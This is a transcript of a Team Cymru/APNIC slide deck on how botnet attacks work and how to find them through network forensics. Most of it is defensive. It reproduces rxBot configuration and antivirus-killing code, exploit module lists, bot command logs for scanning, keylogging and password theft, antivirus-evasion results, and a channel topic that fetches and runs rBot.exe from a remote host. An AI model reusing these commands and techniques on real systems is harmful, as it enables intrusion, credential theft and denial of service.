APNIC

About This Presentation

Title:

APNIC

Description:

APNIC would like to express our thanks and appreciation. Anatomy of ... About five years ago, on-line miscreants had the ... Avast : 0539-0 : 2005-09-26 : ... – PowerPoint PPT presentation

Number of Views:595

Avg rating:3.0/5.0

Slides: 107

Provided by: Ryan1182

Category:

more less

Transcript and Presenter's Notes

Title: APNIC

1
APNIC
Network Analysis and Forensics
This material has been produced by Ryan Connolly
from Team Cymru and is used with permission APNIC
would like to express our thanks and appreciation

2

Anatomy of a Network Attack Ryan Connolly,
ryan_at_cymru.com http//www.cymru.com Presented
by Amante Alvaran, APNIC
3
Agenda

Objectives
Miscreants, Motivations, Misconceptions
A Sample Modern Attack
Botnets
DDoS, Botnet financials
Trends

4
Objectives

What drives on-line malicious activity?
What type of tools are used in modern attacks?
Who is behind these?
How does it impact me?

5
Miscreants, Motivations, Misconceptions
6
Motivations behind the attacksyesterday and
today

About five years ago, on-line miscreants had the
following motivations
fame among the hacker underground
fun
to elevate control among IRC users
Web defacement
Denial of Service attacks against your IRC
nemesis
scripted intrusions

7
Motivations behind the attacksyesterday and
today

Well, the hacker underground has grown up.
Today, an online underground economy exists
solely for the buying and selling of financial
data (your bank account), identity data (your
national ID information), and almost anything
else you can imagine (passports, airline tickets,
etc, etc)
Todays miscreants are criminals.

8
Extracting the Cah

underground cash registers

Miscreant perception of computers
9
Extracting the Cah

underground cash registers

Miscreant perception of computers
10
Extracting the Cah

Proxy Sales, Bot Sales
Malware Sales
Spam, Phishing
Compromised Routers, .mils, .govs, .edus
Full Infos (50/50)
DDoS for Hire
Spyware/adware/malware affiliate programs
The obvious charging to stolen credit cards,
clearing out bank accounts
Illustrative article (the story of Ancheta and
Sobe)
http//reviews.cnet.com/4520-3513_7-6427016-1.htm
l

11
Wheres the Problem?

Security Misconceptions

12
Security Misconceptions

but I use NAT
I block everything inbound.
Our Antivirus keeps us safe.
We dont use Windows.
We have a DMZ.
Im not a target.
I use encryption/IPSec.
I use IPv6.

13
Security Misconceptions Malware worse than
youd expect

71 percent of all corporate networks admit to
having been infected our research suggests that
the actual number is much higher
Malware is so pervasive that it has been detected
in shrinkware shipped directly from the
manufacturer
New versions crop up at a rate that exceeds
10,000 per day

14
Security Misconceptions But I Have An Antivirus
Package

Antivirus packages detect 25 - 50 of malware in
the wild
Good backup procedures and sound policies
required
One tool doesnt fit the job

15
Security Misconceptions Malware Proliferation
1988 - Less than 10 known viruses 1990 - New
virus found every 2 days 1993 - 10 to 30 new
viruses per week 1995 - 6,800 viruses and
variants 2006 at least 10,000/day malicious
code samples (viruses, trojans, etc)
16
Security Misconceptions Malware Still on the
Internet
Running 1066 samples through 32 AV packages
yielded a 37 detection rate
17
Security Misconceptions

The miscreants understand return on investment
Aachen University of Technology
137.226.0.0-137.226.255.255
Abilene Christian University 150.252.0.0-150.252.2
55.255
Acadia University 131.162.0.0-131.162.255.255
Agricultural University Wageningen
137.224.0.0-137.224.255.255
Aichi-Gakuin University 163.214.0.0-163.214.255.25
5
Alfred University 149.84.0.0-149.84.255.255
American University 147.9.0.0-147.9.255.255
Andrews University 143.207.0.0-143.207.255.255
Aomori Public University 163.54.0.0-163.54.255.255
Appalachian State University 152.10.0.0-152.10.255
.255
Aristotle University of Thessaloniki
155.207.0.0-155.207.255.255
Arizona State University 129.219.0.0-129.219.255.2
55
... 926 more prefixes
its a business after all.

18
Security Misconceptions

Think again

19
(No Transcript)
20
(No Transcript)
21
A Sample Modern Attack
22
Sample Modern Attack
Attacker
Step 1 Attacker scans a wide range of IPs in
order to detect a vulnerable IIS Server.
Vulnerable IIS Server
23
Sample Modern Attack
Attacker
Step 2 Attacker uses a PHP exploit to gain
user-level access to the IIS Server. Step 3
Using a privilege escalation exploit, the
attacker gains root-level access to the machine.
Vulnerable PHP application
24
Sample Modern Attack
Oracle Database Server
Doe, John MC 9876 5432 1098 7654, exp 11/09,
security code 123 Address 123 Unfortunate
St New York, NY, USA Phone 1 555
555-5555 Averageguy, Bob Visa 1234 5678 9012
3456, Exp 01/11, security code 987 456
Money-be-gone Ave London, U.K. Phone x xxx
xxxxxxx
Rooted IIS Server
Step 4 Attacker identifies the back-end Oracle
database server that contains the websites
customer data. Step 5 The misconfigured
database server allows the IIS server to both
insert and read information in the
database. Step 6 The attacker is able to access
all the customer credit card and account
transaction databases.
Doe, John MC 9876 5432 1098 7654, exp 11/09,
security code 123 Address 123 Unfortunate
St New York, NY, USA Phone 1 555
555-5555 Averageguy, Bob Visa 1234 5678 9012
3456, Exp 01/11, security code 987 456
Money-be-gone Ave London, U.K. Phone 020 5555
5555
25
Sample Modern Attack
Step 7 Attacker advertises stolen credit card
numbers on an underground economy network.
Underground Economy Network
Doe, John MC 9876 5432 1098 7654, exp 11/09,
security code 123 Address 123 Unfortunate
St New York, NY, USA Phone 1 555
555-5555 Averageguy, Bob Visa 1234 5678 9012
3456, Exp 01/11, security code 987 456
Money-be-gone Ave London, U.K. Phone x xxx
xxxxxxx
Criminal
Step 8 Credit card information is purchased by
another criminal.
...and the attacker makes BIG BUCKS!
26
Sample Modern Attack
Step 9 Attacker modifies IIS server to append
JavaScript at the end of the websites home page
that will exploit a vulnerability in unpatched
versions of Internet Explorer. (100k sites in
one month) Step 10 The attacker downloads
installs a bot client onto the machines of the
unsuspecting users.
Rooted IIS Server
Unsuspecting web users
27
Sample Modern Attack

Botnet Command Control Center (CC)
somedomain.com6667
Step 11 The attacker bot client instructs the
machines to join an IRC channel on
somedomain.com, port 6667. From here, the
attacker can issue commands to his drone army.
28
Sample Modern Attack
Step 12 Attacker installs a keystroke logger on
computers in his drone army in an to grab bank
account usernames passwords.
29
Sample Modern Attack
Bank account Usernames passwords
Bank account Usernames passwords
Bank account Usernames passwords
Bank account Usernames passwords
Bank account Usernames passwords
Step 13 Attacker gathers bank account username
password information and advertises this on an
underground economy network. Selling this
information
Underground Economy Network
Bank account Usernames passwords
... the attacker AGAIN makes BIG BUCKS!
30
Sample Modern Attack
Step 14 The attacker issues commands to the
drones to scan sploit more machines.
31
Sample Modern Attack
Step 15 Scan sploit
32
Sample Modern Attack
Botnet CC
Step 16 Phone home to CC and gather more
financial data (steps 11, 12, 13, 14, 15)
33
In Summary
Attacker
Attackers exploits un-patched IIS web servers.
Sites now deliver additional java script at the
end of each page.
Finally the attacker retrieves and uses the
captured usernames, passwords
Unknowing users casually browsers to these
compromised sites. The java script executes
downloading a key logger. This works because of
an unknown/un-patched IE vulnerability.
When users browse to web sites the key logger
captures and forwards the strokes to other
compromised systems.
http//antivirus.about.com/od/virusdescriptions/a/
scob.htm
34
Botnets
35
Lets talk aboutbotnets
36
Botnets

Configuring, Compiling, Packing
Collecting
Administering
Botnet functions
UNIX botnets
Client defense detection

37
Building Botnets

Attackers arduous configuration task
Windows rxBot
char botid "rx01" // bot id
char version "rxBot v0.7.8 Private
LsassIIs5ssl By Niks"
char password "botpass" // bot password
char server "irc.mybotnet.net" // server
int port 6667 // server port
char serverpass "servpass" // server
password
char channel "rbotdev" // channel that
the bot should join
char chanpass chanpass" // channel
password
char filename "mswin.exe" // destination
file name
char keylogfile "keys.txt" // keylog
filename
char valuename "Microsoft Update" // value
name for autostart
char nickconst "URX" // first part to the
bot's nick

38
Infection Vectors

Miscreant doesnt need the latest and greatest
(scan and sploit)
EXPLOIT exploit
"lsass135", "lsass135", 135, lsass, 0, TRUE,
FALSE,
"lsass445", "lsass445", 445, lsass, 0, TRUE,
FALSE,
"lsass1025", "lsass1025", 1025, lsass, 0, TRUE,
FALSE,
"netbios", "NetBios", 139, NetBios, 0, FALSE,
FALSE,
"ntpass", "NTPass", 445, NetBios, 0, FALSE,
FALSE,
"dcom135", "Dcom135", 135, dcom, 0, TRUE,
FALSE,
"dcom445", "Dcom445", 445, dcom, 0, TRUE,
FALSE,
"dcom1025", "Dcom1025", 1025, dcom, 0, TRUE,
FALSE,
"iis5ssl", "IIS5SSL", 443, IIS5SSL, 0, TRUE,
FALSE,
"mssql", "MSSQL", 1433, MSSQL, 0, TRUE, FALSE,
"beagle1", "Beagle1", 2745, Beagle, 0, FALSE,
TRUE,
"beagle2", "Beagle2", 2745, Beagle, 0, FALSE,
TRUE,
"mydoom", "MyDoom", 3127, MyDoom, 0, FALSE,
FALSE,
"optix", "Optix", 3410, Optix, 0, FALSE,
FALSE,
"upnp", "UPNP", 5000, upnp, 0, FALSE, TRUE,
"netdevil","NetDevil", 903, NetDevil, 0, FALSE,
FALSE,
"DameWare", "DameWare", 6129, DameWare, 0,
TRUE, FALSE,

39
Building Botnets - Compiling

Using MS Visual C, MS Platform SDK

40
Building botnets - packing

Common packers Yoda, UPX, MEW, ASPack, FSG,
Morphine, etc.

41
Antivirus The miscreants opinion

Bypassing AV is one of the top goals of the
malware creators. They use the AV products as
part of their malware testing process.
the problem is the 032 code is av detected
out of the box
yeah, but good av unpacks
true
kaspersky looks at the header info on the
linker.
mcafee doesn't detect it
only thinkg i see was that f-secure
i doubt a lot of people know how to get
around that
mcafee is stupid, so is norton
i have a packer that changes header info
ah Avp
i havnt used it in forever
in the us maybe, but in asia/europe
kaspersky and ahnlab are big
that's why that Xtrmoffer or whatever
stupid name he calls it is detected.
after like a coupoe of weeks wouldn't it
get detected
only if it's reported to kaspersky

42
Building botnets - packing
After packing

Test against AV vendors
Code from 2004
Only 25 packed detect rate
rbot-yoda.exe (30.73s) 4/16 detected (pre
packing 13/16 detected)
Antivirus Version Update
Time Tag
AntiVir 6.32.0.44 2005-09-26
18.33s Packer/YodaProt virus
Arcavir 1.0.0 2005-09-26
00.68s no_virus
Avast 0539-0 2005-09-26
00.84s no_virus
BitDefender 7.0 2558 2005-09-26
21.19s Backdoor.RBot.78F3AE1B
ClamAV 0.86.2/1102 2005-09-25
15.02s no_virus
Dr. Web 4.32.2 2005-09-26
21.39s no_virus
F-Prot 4.5.4 2005-09-23
15.08s no_virus (Packed)
F-Secure 4.52 2461 2005-09-26
06.95s Backdoor.Win32.Rbot.gen
Mcafee 4.4.00 4589 2005-09-23
13.88s no_virus
MKS 1.9.6 2005-09-24
00.97s no_virus
NOD32 1.1232 2005-09-25
17.28s prob. unknown NewHeur_PE
Norman 5.83 2005-09-25
20.60s no_virus

Before packing
43
Building Botnets Preventing AV Outbreaks

/
This kills all active Antivirus processes that
match
Thanks to FSecure's Bugbear.B analysis _at_
http//www.f-secure.com/v-descs/bugbear_b.shtml
/
void KillAV()
const char szFilenamesToKill455
"ACKWIN32.EXE", "ADVXDWIN.EXE",
"AGENTSVR.EXE", "ALERTSVC.EXE", "ALOGSERV.EXE",
"AMON9X.EXE", ...
for(int i0 szFilenamesToKilli!NULL i)
KillProcess(szFilenamesToKilli)
() Source extracted from rxbot

44
Building Botnets - Collecting

Typical IRC Daemons
Unreal , Bahamut, Beware, Bitlbee (IM),
Ultimate, Wircd, Bircd, Conference Room, Xtreme
Typical IRC Bots
Agobot, phatbot, sdbot, gtbot, reptile, rxbot,
rbot, helibot, forbot

45
Building Botnets first infection
46
Building botnets IRCd

IRC servers are optimized for bots
Rogueness usually obvious
Stripped output or l33t sp33k
Disabled commands (whois, lusers, admin, list,
etc.)
Incorrect responses
Keyed Channels, Keyed Servers
Modified syntax Random Ports
Compromised or paid for hosting
Antispy protection
1945 -!- ERROR Closing Link spy1W.X.Y.Z
(Zlined (banned))
1945 -!- Irssi Connection lost to SERVER

47
Building botnets - spreading

Spreading command for this botnet
.advscan dcom135 100 5 3 192.168.10.0
Syntax
.advscan
1240 .advscan dcom135 100 5 4
192.168.10.25
1240 SCAN Sequential Port Scan
started on 192.168.10.25135 with a delay of 5
seconds for 4 minutes using 100 threads.
1241 TFTPD File transfer started
to IP 192.168.10.35
(C\WINDOWS\system32\mswin.exe).
1241 TFTPD File transfer
complete to IP192.168.10.35
(C\WINDOWS\system32\mswin.exe).
1241 Dcom135 Exploiting IP
192.168.10.35.
1242 -!- URX35505 ynioal_at_192.168.1.1 has
joined rbotdev
1242 .scanstats
1242 SCAN Exploit Statistics
lsass135 0, lsass445 0, lsass1025 0, NetBios
0, NTPass 0, Dcom135 1, Dcom445 0, Dcom1025
0, IIS5SSL 0, MSSQL 0, Beagle1 0, Beagle2 0,
MyDoom 0, Optix 0, UPNP 0, NetDevil 0,
DameWare 0, Kuang2 0, Sub7 0, Total 1 in 0d
0h 3m.

48
Botnets for theft
Keylogging (.keylog on) 1242 .keylog
on 1242 KEYLOG Key logger
active. 1245 KEYLOG (Changed
Windows Inbox - Outlook Express) 1245 URX09620 KEYLOG (Changed Windows Logon -
192.168.1.10) 1245 KEYLOG
johnTABjohn (Changed Window Download Folder(W.X
.Y.Z) 1245 KEYLOG (Changed
Windows Inbox - Outlook Express) Botnet jacking
(.psniff on) Carnivore for rbot 1802
.psniff on 1802
PSNIFF Carnivore packet sniffer active. 1803
PSNIFF Suspicious FTP packet
from 192.168.10.103912 to 192.168.10.106667 -
PASS servpass 1803 PSNIFF
Suspicious FTP packet from 192.168.10.103912 to
192.168.10.106667 - NICK URX44177 1803 URX53579 PSNIFF Suspicious IRC packet from
192.168.10.103912 to 192.168.10.106667 - JOIN
rbotdev 1803 PSNIFF Suspicious
BOT packet from 192.168.1.206667 to
192.168.1.203912 - botherd!admin_at_staff.mybotnet.
net PRIVMSG rbotdev .login botpass
49
Botnets for theft

Screen/video capture (.capture screen )
1802 .capture screen c\screen.jpg
1802 CAPTURE Screen capture
saved to c\screen.jpg.
Key stealing - CD, Serials, etc. (.getcdkeys)
1802 .getcdkeys
1802 Microsoft Windows Product ID
CD Key (XXXXX-XXXXXXXXXX-XXXXX).

50
Botnets for theft

Password stealing (.findpass)
1803 .findpass
1803 FINDPASS Only supported on
Windows NT/2000.
1803 FINDPASS Only supported on
Windows NT/2000.
1803 FINDPASS Only supported on
Windows NT/2000.
Clipboard contents (.getclip)
1803 .getclip
1803 -Clipboard Data-
1803 Attention
1803 -Clipboard Data-
1803 (null)
1803 -Clipboard Data-
1803 (null)

51
Other Botnet functions

Securing the machine (.secure)?
1311 .secure
1311 SECURE DCOM disabled.
1311 SECURE Restricted access to
the IPC Share.
1311 SECURE Restricted anonymous
enumeration of SAM accounts.
1311 SECURE Removed
SeNetworkLogonRights from 5 accounts in local
system policy.
1311 SECURE Failed to delete
'IPC' share.
1311 SECURE Failed to delete
'ADMIN' share.
1311 SECURE Share 'C' deleted.
1311 SECURE Network shares
deleted.

52
Botnets for nix

What are your routers and switches good for?
Plenty!
Bouncing
Spam
DDoS (spoofed and non)?
File Storage
Websites
Sniffing
Watch flows THROUGH and FROM your routers (more
on flows later)

53
Spot the Bot!
54
Botnets (and other malware)Client-side Defense

Defensive tools include
Anti-virus, anti-spyware
Microsoft Windows Defender (free!)
host-based firewalls
seccheck (www.mynetwatchman.com)
Sysinternals
Behavioral-based heuristic-based tools work
when antivirus signatures fail
Sana Security, Prevx

55
Botnet Detection

How do I spot them?
Network Flows
Dark space
Sink Holes
Pattern Matching
Logs (DNS, Web, Proxy, etc)
Malware collector
Did we mention network flows?
Collaboration!
See the network forensics talk.

56
DDoS Botnet Financials
57
DDoS for hire example

If you take down for a week
Ill pay you 500/day.
Just enough is good enough
Various targets
Network Infrastructure (traceroute)
Server Infrastructure (DNS, Web, SMTP)
Actual IP

58
DDoS extortion example

Dear Friend.
I think you'll understand what I want offer to
you. You have very good site with very good
clients. Every clent paid to you fee 15 per
login.And for now you got 37 grands only for
logging! We are some good peoples who can shut
down you site forever. Please, respond, are you
ready to pay only 1 grand and we'll leave your
site forwer too. Because you answer - think about
users. I think they'll disturb about your forum
and about money which they paid to you. You have
one hour think. Respond with your choice. Or
we'll show what we can do for you. Also remeber,
If we'll do some price can change up. Be sure
with your choice.
The victim didn't pay, so the packets came to
call. The DDoS was launched from 171 unique
sources. It was a TCP SYN flood against TCP 80
on the web server. The attack peaked at
20.96Mbps on ingress, which did a fair bit of
harm to this customer.

59
Bot Financials

The price of a compiled bot binary is now upwards
of US 500 each.
Bots themselves range from US .04 to US 40
each.
DDoS attacks for hire are between US 500 each
and US 1500 each.
Modifications to bot source and IRC daemon source
can run into the thousands of dollars US.

60
Developing Attack Methodologies Trends
61
Developing Attack Methodologies Trends

Peer-to-peer botnets
Drive-by infection vector
DNS Amplification Attacks
Router Abuse
Attack Trend Summary

62
Another kind of attack DNS Amplification

Miscreant discovers the joy of DNS amplification.
Miscreant and friends lose thousands USD (if not
more) in an online Pyramid scheme.
Miscreant unleashes 8 Gbps of DDoS from 122K DNS
name servers against those involved.

63
DNS Amplification Attacks

Miscreant creates large TXT RR (4096 bytes)
Miscreant spoofs source address (UDP packet),
sends request to DNS servers that permit open
recursion
DNS servers respond to spoofed source address
Using many DNS servers, this can be a very nasty
DDoS attack
A DNS request is about 70 bytes.
Response is 4096 bytes. (about 160
amplification ratio!)

64
DNS Amplification Attacks

Avoid being a part of these!
disallow open recursion
disallow open responses from dns cache
disallow spoofing (use uRPF or similar type ACLs)

65
Router Abuse

Miscreants compromise high-end routers at several
LARGE providers.
Used keystroke logging malware.
Determined netblocks to scan based on router
ACLs.
Configurations changed, IPSEC tunnels deployed,
DDoS
attacks launched, bouncing, sniffing.

And NO ONE noticed!
66
Attack Trends

Movement toward high-power NIX boxes with big
pipes as bots.
Encrypted command control communication for
botnets.
P2P for botnet control
DDoS extortion as a profit maker.
Better knowledge of bad neighborhood of the
internet areas of the internet that are most
likely to contain vulnerable systems
Better knowledge of countermeasures against
hacking attempts where the honeynets are, for
instance.
Better packing obfuscation of malware, making
reverse engineering more difficult
Lower price for bots, higher price for compiled
binaries.

67
Conclusions

Botnets are an old problem and are still growing,
largely due to the financial motivation.
Security misconceptions leads to security
breaches.
Defense in depth! It may take multiple tools to
do the job.
If you dont see it, chances are youre not
looking hard enough.

68
Network Forensics

what does it mean?
network forensics is the analysis of network
events in order to discover the source of problem
incidents.

69
What sort of problem incidents? aka network
badness?

lots of things - for this discussion, let's talk
primarily about botnets

70
Why botnets?

Botnets are currently the most significant force
behind many miscreant activities that make our
lives as network operators -- and as citizens of
the internet -- more difficult.
Botnets allow criminals to make money - DDoS,
warez, phishing, financial crimes, etc
Bottom line
It's all about the money...
but that's another talk.

71
Reminder - BOTNET
Command Control Servers
Compromised drones
Types agobot, forbot, gtbot, phatbot, rbot,
rxbot, sdbot, phatbot, storm, etc, etc.
72
Creation of a botnet

Scan sploit
it still works
many, many vulnerabilities, and more every day
Scanning entire /8 takes approximately 32 hours.
Bad neighborhoods most popular - cable DSL
ranges home users are less protected how about
that VPN connection?
Malware attached to emails (i.e.
socially-engineered spreading)
Files transferred via Instant Messaging programs
Flaws in Internet Explorer, Firefox, and many,
many others
etc, etc, etc attacks are against all platforms
(NIX, Windows XP/2000/98/etc, Mac OS), in many
ways no one is safe!

73
Botnet scan sploit
74
Creation of a botnet

phone home," usually using DNS, sometimes using
a hard-coded IP
Bots join a channel on the IRC server and wait to
accept commands
HTTP-based bots increasing harder to detect
P2P bots Phatbot, Superbot, Storm
Increasingly encrypted obfuscated connections
to CC
Distributed CCs need for coordinated takedown

75
Preventative measuresAh, but how to ease the
pain?

(1) Social factor - how do you get users to stop
clicking on bad attachments protect against
social engineering attacks?
(2) Administrative factor - how do you get admins
to install stay up-to-date with necessary
patches?
(3) Engineering factor - how do you get software
developers to write secure code?
(4) Criminal factor how do you remove the
motivation to commit on-line crime?
When you know the answers to these, PLEASE, let
me know!

76
So, for now, we need to make the bad guy's life
more difficult.Objective deter miscreants from
committing online crime.
77
Botnets - How do we find them?Network Forensics

(1) Watch flows
(2) Watch DNS
(3) Effectively use Darknets
(4) Sniffing
(5) Sandboxing
(6) Malware analysis

78
Collecting flows
Flow Bi-directional transaction of multiple
packets (TCP)
Web server 64.233.167.99
Internet
2007-01-30 065353.370 04.545 TCP
2.168.30.103575 - 64.233.167.9980 .AP.SF 0
72 5600 1
uplink
Internal network
Client 192.168.30.10
Flow collector
79
Collecting flows enabling collection

A generic Cisco example
interface fastethernet 0/0
ip route-cache flow
Set to netflow version 5 and set timeout
ip flow-export
ip flow-export version 5
Break-up long flows into 5 minute segments
(should be less than your file rotation time)
ip flow-cache timeout active 5
Flows exported to a flow collector

80
Collecting flows enabling collection

nfcapd
Flow collector
Listens for flows on a given port and stores the
data into files that are rotated a pre-set number
of minutes
One nfcapd per flow stream
Example
nfcapd w D l /var/log/flows/router1 p 23456
nfcapd w D l /var/log/flows/router2 p 23457
-w sync file rotation with next 5 minute
interval
-D fork to background
-l location of log file

81
nfdump
http//nfdump.sourceforge.net/
82
Collecting flows enabling collection

Use nfdump on the resulting files to insert flow
records into a database and analyse (similar to
tcpdump)
Stager system for aggregating and presenting
network statistics.
Collects stores network info (netflow, SNMP,
MPing) in a database
Provides a web front-end

83
Watching flows Total network awareness
84
Watching flowsnfdump
Packets Bytes pps bps Bpp Flows 1.4 M 2.0
G 2023 5.6 M 1498 1
Sort flows by total number of bytes
nfdump -r nfcapd.200508300700 -o extended
-s srcip -s ip/flows -s dstport/pps/packets/by
tes -s record/bytes
Top 10 flows ordered by bytesDate flow Prot
Src IP AddrPort Dst IP AddrPort Flags
Tos Packets Bytes pps bps Bpp Flows2005-08-30
TCP 126.52.54.2747303 - 42.90.25.218435
...... 0 1.4 M 2.0 G 2023 5.6 M 1498
12005-08-30 TCP 198.100.18.12354945 -
126.52.57.13119 ...... 0 567732 795.1 M 627
2.5 M 1468 12005-08-30 TCP 126.52.57.1345633 -
91.127.227.206119 ...... 0 321148 456.5 M 355
4.0 M 1490 12005-08-30 TCP 126.52.57.1345598 -
91.127.227.206119 ...... 0 320710 455.9 M 354
4.0 M 1490 12005-08-30 TCP 126.52.57.1345629 -
91.127.227.206119 ...... 0 317764 451.5 M 351
4.0 M 1489 12005-08-30 TCP 126.52.57.1345634 -
91.127.227.206119 ...... 0 317611 451.2 M 351
4.0 M 1489 12005-08-30 TCP 126.52.57.1345675 -
91.127.227.206119 ...... 0 317319 451.0 M 350
4.0 M 1490 12005-08-30 TCP 126.52.57.1345619 -
91.127.227.206119 ...... 0 314199 446.5 M 347
3.9 M 1490 12005-08-30 TCP 126.52.54.3559898 -
132.94.115.592466 ...... 0 254717 362.4 M 322
3.7 M 1491 12005-08-30 TCP 126.52.54.3559773 -
55.107.224.18711709 ...... 0 272710 348.5 M 301
3.1 M 1340 1
nntp
the possibilities are endless
85
Watching flowsnfdump
nfdump r nfcapd_file A src,dstport
c 10 src ip 192.168.2.12
See scanning on your network
Date flow start Prot Src IP AddrPort
Dst IP AddrPort Packets Bytes 2006-12-02
140212 TCP 192.168.2.1247303 -
192.168.2.13445 1 60 B 2006-12-02
140212 TCP 192.168.2.1247304 -
192.168.2.14445 1 60 B2006-12-02
140212 TCP 192.168.2.1247305 -
192.168.2.15445 1 60 B 2006-12-02
140212 TCP 192.168.2.1247306 -
192.168.2.16445 1 60 B 2006-12-02
140212 TCP 192.168.2.1247307 -
192.168.2.17445 1 60 B 2006-12-02
140213 TCP 192.168.2.1247308 -
192.168.2.18445 1 60 B 2006-12-02
140213 TCP 192.168.2.1247309 -
192.168.2.19445 1 60 B 2006-12-02
140213 TCP 192.168.2.1247310 -
192.168.2.20445 1 60 B 2006-12-02
140213 TCP 192.168.2.1247311 -
192.168.2.21445 1 60 B 2006-12-02
140213 TCP 192.168.2.1247312 -
192.168.2.22445 1 60 B
86
Watching flowsnfsen a graphical interface!
Shows TCP flows for a 24 hour period. Colours
represent portsred 80, green445, blue25
http//nfsen.sourceforge.net
87
Watching flowsIdentify DDoS sources

DDoS sources are very likely compromised devices
(assuming they arent spoofed).

DDos attack
88
Watching flowsTotal network awareness an
example

By examining flows, youve noticed that
192.168.100.10 has scanned 100 hosts in your
network on UDP port 1434, with a 404-byte packet
(characteristic of slammer).
Looking at flows to/from 192.168.100.10, you see
connections to your company mail server, news
sites, google, etc, and to the following
Date flow start Prot Src IP AddrPort
Dst IP AddrPort Packets Bytes
2006-12-02 140212 TCP 192.168.100.1033372 -
80.240.192.816667 1 60 B
Using the Cymru whois IP-to-BGP server, you see a
connection to Swift Global, an ISP in Kenya.
whois -h whois.cymru.com 80.240.192.81
AS IP AS Name
80.240.192.81 SWIFTGLOBAL-AS
Logging-on to the IRC server, you identify
channels with topics set to things like,
.http.update http///mugenxu/rBot.exe
c\windows\msy32awds.exe 1". Users within the
channels have cryptic nicks, such as XP-39381.

89
Watching flowsTotal network awareness

By examining flows to/from known CC servers,
youll identify machines compromised in your
network and other networks.
it greatly helps to be a part of a trusted
community that shares this sort of info
...but more on that in a minute!
Useful flow-related tools
nfsen/nfdump (http//nfdump.sourceforge.net/)
fprobe (http//fprobe.sourceforge.net/)
SiLK (http//silktools.sourceforge.net/)
Stager (http//software.uninett.no/stager)
flow-tools (http//www.splintered.net/sw/flow-tool
s/)
InMon (www.inmon.com)
ntop (www.ntop.org)
Argus (http//www.qosient.com/argus/)

90
Watching DNSTo find compromised devices
identify CCs

known bad DNS names very useful
DNS query logging is essential
short TTLs in a DNS A record are indicative of a
CC
TTLs are used to determine how long to cache the
record before updating it
dnswatch/dig
dig hackerdomain.com A
hackerdomain.com 60 IN A
Repetitive A queries - a bot?
Repetitive MX queries - a spam bot?
known bad DNS names - it helps to be a part of a
community that finds shares known bad DNS names
...but more on that in a minute.

91
DarknetsWhat is a Darknet?

Routed, allocated IP space in which (seemingly)
no active servers or services reside
Any traffic that enters a Darknet is aberrant
little chance of false positives
Can use flow collectors, sniffers and/or IDS
boxes for further analysis
Similar ideas CAIDA (Network Telescope) and
University of Michigan (Internet Motion Sensor)

92
DarknetsWatch your Dark Space!
allocations of external IP space
Allocated
Allocated
Allocated
Unallocated
Unallocated
Unallocated
allocations of internal IP space
93
DarknetsWatch your Dark Space!
Collector
Argus http//www.qosient.com/argus/ tcpdump Darkn
et set-up http//www.cymru.com/Darknet/
94
DarknetsWatch your Dark Space!

ra program to analyze Argus output
(http//www.qosient.com/argus/ra.1.htm)
Find connections characteristic of dameware
ra -r ./argus.out.9 -n tcp and dst port 6129
22 Aug 06 072428 tcp 82.50.1.222.2688 -
xxx.yyy.210.32.6129 RST
22 Aug 06 072428 tcp 82.50.1.222.2689 -
xxx.yyy.210.33.6129 RST
22 Aug 06 072428 tcp 82.50.1.222.2692 -
xxx.yyy.210.34.6129 RST
22 Aug 06 072428 tcp 82.50.1.222.2690 -
xxx.yyy.210.35.6129 RST
22 Aug 06 072428 tcp 82.50.1.222.2693 -
xxx.yyy.210.36.6129 RST
22 Aug 06 072428 tcp 82.50.1.222.2691 -
xxx.yyy.210.37.6129 RST
22 Aug 06 072428 tcp 82.50.1.222.2694 -
xxx.yyy.210.38.6129 RST
22 Aug 06 072428 tcp 82.50.1.222.2645 -
xxx.yyy.210.39.6129 RST
whois h whois.cymru.com 82.50.1.222
Querying whois.cymru.com
whois.cymru.com
AS IP AS Name
3269 82.50.1.222 ASN-IBSNAZ TELECOM
ITALIA

Looking for dameware vulnerability
95
DarknetsWatch your Dark Space!
96
DarknetsWatch your Dark Space!

inward-facing AND outward-facing
If you ran a bank -- would you put security
cameras inside your bank, in the parking lot, or
both?

97
Darknetsinward-facing

most malware scans the compromised hosts /16 for
vulnerabilities.
allows you to identify hosts within your network
that are scanning your local address space
in other words, compromised hosts WITHIN your
local address space.
something you'd like to know about, right?

98
Darknetsinward-facing

Unless youre conducting a pentest or
vulnerability scan, you shouldnt see scans
inside your own network.
Things to watch for inside your network
Attempted connections to ports associated with
known vulnerabilities
Attempted connections to known malware
listening ports
Any scanning activity.
not to mention the obvious, but wherever this
activity is originating from, you have a problem.

99
Darknetsoutward-facing
3 different darknets. Spike at same time.
Indicative of spread of Witty Worm.
Witty Worm

allows you to see who is scanning you
who is trying to cause you pain?
with what?
Internet garbage meter

100
Darknetsoutward-facing
Spike port 445 scans. This was indicative of
the first outbreak of the LSASS vulnerability
Signature Recognition Dest TCP/445 Scanning for
Win2K Open Shares Dest UDP/1434 and size 404
bytes Slammer Scans
New malware catch it in beta!
101
Sandboxing

run malware in a virtual environment to determine
actions
what domain name does the malware look-up, or
what IP does it try to connect to?
Identify modified files, registry entries, and
other changes to the system
Identify patterns of network activity which can
then be applied to the darknets flow collectors
to identify this malware.
Identify new trends in malware development see
where the miscreants are headed!
http//www.cwsandbox.org/, Norman
(http//sandbox.norman.no/)
to make this work, also need to collect malware
http//nepenthes.mwcollect.org/
some malware detects some sandboxing environments
and will cease execution
economies of scale
he with the biggest collection has the best
security
or, he with the best community has the best
security
but more on that in a minute.

102
Watch Network Traffic

sniff network traffic for common botnet commands
return traffic.
In capture files can look for patterns in data

SDBot advscanasc portmethod threads
delay minutes Agobot cvar.set
spam_aol_channel channel
000 50 52 49 56 4D 53 47 20 23 6D 65 73 73 61
67 65 PRIVMSG message 010 73 23 20 3A 5B 6C
73 61 73 73 5F 34 34 35 5D 3A s lsass_445
020 20 45 78 70 6C 6F 69 74 69 6E 67 20 49 50
3A 20 Exploiting IP 030 31 39 32 2E 31 36 38
2E 34 2E 32 32 39 2E 0D 0A 192.168.4.229...
List of AgoBot, SDBot, UrXBot
commands http//www.honeynet.org/papers/bots/botn
et-commands.html
103
Watch Network Traffic

Use snort signatures to identify common bot CC
traffic
alert tcp any any - any 6667
(msg"IRC BOT 1 - lsass"
flowto_server,established
content"lsass"
nocase classtypebad-unknown sid3011381
ev1)
http//www.bleedingsnort.com/
http//www.giac.org/practicals/GSEC/Chris_Hanna_GS
EC.pdf
Increasing trend in encrypted IRC channels for
CCs, which makes either of these techniques
problematic

104
Malware Analysis

also works, but
miscreant countermeasures (packing, etc) can make
this especially difficult
Wouldn't you rather analyze flows? -)

105
Collaboration

If your organization is doing these
watching flows to identify CCs
discovering rogue domain names
using Darknets to identify compromised devices
sandboxing to analyze malware
sniffing traffic to find bots
doing malware analysis
